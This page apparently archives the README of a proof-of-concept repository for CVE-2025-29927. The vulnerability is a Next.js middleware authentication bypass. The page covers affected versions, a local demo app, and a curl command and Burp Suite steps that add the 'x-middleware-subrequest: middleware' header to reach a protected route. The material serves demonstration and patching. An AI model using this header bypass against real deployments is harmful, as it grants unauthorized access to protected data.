关联漏洞
介绍
# Next.js CVE-2025-29927
This repository contains a proof of concept for CVE-2025-29927 vulnerability in Next.js, where the internal header ```x-middleware-subrequest``` can be exploited to bypass middleware checks such as authentication.
# Affected Versions
- Next.js 15.x < 15.2.3
- Next.js 14.x < 14.2.25
- Next.js 13.x < 13.5.9
## Installation
> 🧪 This project was tested with **Next.js v13.4.19**.
1. Clone the repository:
```bash
git clone https://github.com/goncalocsousa1/CVE-2025-29927.git
cd CVE-2025-29927
```
2. Install dependencies:
```bash
npm install
```
## Running the Application
1. Start the development server:
```bash
npm run dev
```
2. Access the application in your browser:
```
http://localhost:3000
```
## How the website works
The application demonstrates a simple authentication system with a protected route that can be bypassed using the CVE-2025-29927 vulnerability. Here's how it works:
1. **Home Page (`/`)**
- Displays a welcome message and a login button
- When clicked, the login button sets a fake authentication cookie (`auth-token`)
- After "logging in", users are redirected to the protected page
2. **Protected Page (`/protected`)**
- Contains sensitive information that should only be accessible to authenticated users
- Protected by middleware that checks for the presence of the `auth-token` cookie
- Normally, unauthenticated users would be redirected to the home page
3. **Middleware Protection**
- The middleware checks if the user has an `auth-token` cookie
- If not authenticated and trying to access `/protected/*` routes, redirects to home page
- This protection can be bypassed using the vulnerability
4. **Vulnerability Demonstration**
- The application showcases how the `x-middleware-subrequest` header can be exploited
- This allows attackers to bypass the middleware authentication check
- Even without a valid `auth-token` cookie, attackers can access protected routes
## How to Exploit
This application includes a protected route at ```/protected``` that normally requires authentication. However, by using the header ```x-middleware-subrequest: middleware``` in a request like ```curl -H "x-middleware-subrequest: middleware" http://localhost:3000/protected```, you can bypass the authentication check.
You can also reproduce this behavior using [Burp Suite](https://portswigger.net/burp/communitydownload) by intercepting the request and manually adding the header.
To try this with Burp Suite, open the ```Proxy``` tab and go to the ```Intercept``` sub-tab. Make sure ```Intercept is On```, then click on **Open Browser** and navigate to the protected route: ```http://localhost:3000/protected```
Burp Suite will capture the request to the protected route. From there, add the following header: `x-middleware-subrequest: middleware` (*highlighted in the screenshot above*). Finally, forward the request and access the protected route.
# Solution
Update to one of the following patched versions:
- Next.js 15.2.3 or higher
- Next.js 14.2.25 or higher
- Next.js 13.5.9 or higher
# Sources
- https://vercel.com/blog/postmortem-on-next-js-middleware-bypass
- https://nvd.nist.gov/vuln/detail/CVE-2025-29927
文件快照
[4.0K] /data/pocs/3e0f1c3d296fed86d5bcb989450f56b959601b6b
├── [4.0K] app
│ ├── [ 59] globals.css
│ ├── [ 341] layout.tsx
│ ├── [ 943] page.tsx
│ └── [4.0K] protected
│ └── [1013] page.tsx
├── [ 438] middleware.ts
├── [ 134] next.config.js
├── [ 201] next-env.d.ts
├── [ 540] package.json
├── [ 71K] package-lock.json
├── [ 82] postcss.config.js
├── [3.4K] README.md
├── [ 253] tailwind.config.js
└── [ 595] tsconfig.json
2 directories, 13 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。